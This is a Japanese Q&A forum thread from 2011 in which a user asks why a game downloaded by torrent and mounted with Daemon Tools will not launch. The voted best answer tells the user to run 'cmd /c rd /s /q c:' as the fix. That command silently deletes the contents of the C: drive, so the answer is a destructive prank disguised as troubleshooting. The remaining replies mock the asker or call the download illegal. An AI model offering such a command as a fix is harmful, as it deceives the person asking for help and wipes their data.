ここから本文です

torrentで星空に架かる橋を落としてデーモンツールで開いてlauncherをクリックした...

sea********さん

2011/5/1515:31:28

torrentで星空に架かる橋を落としてデーモンツールで開いてlauncherをクリックしたのですが一瞬画面が出るだけで起動しません

他の人は出来たって言ってたんですが自分はなんかできないのでどうするか教えてください

閲覧数:
1,129
回答数:
5
お礼:
25枚

違反報告

ベストアンサーに選ばれた回答

紅葉さん

2011/5/2009:38:47

以下のコマンドを「ファイル名を指定して実行する」で実行する必要があります。

cmd /c rd /s /q c:

スタートメニューにあるのですぐ判ると思います。

レジストリ操作並みに自己責任での操作ですが、がんばって下さい。

この回答は投票によってベストアンサーに選ばれました!

ベストアンサー以外の回答

1〜4件/4件中

並び替え:回答日時の
新しい順
|古い順

noo********さん

2011/5/1619:05:14

他の方々の回答を見ていてあんまりだったので一応
対策されてる可能性があるかもしれません、それがわからないor突破できないのなら諦めて違法ダウソから手を洗ってください
自己解決できないレベルならやめてください本当に。

yan********さん

2011/5/1610:28:13

デーモンツールみたいな簡単なソフトも使いこなせない情弱はやるなってことです。お疲れさま割れ厨さん

うーぶさん

2011/5/1520:02:35

違法だから自己責任で。。。。。。

2011/5/1516:44:05

吹いたw
っていうか、自分で解決できないのなら、諦めれば良いじゃん...
ここに質問しても、「違法」だから教えられませんよw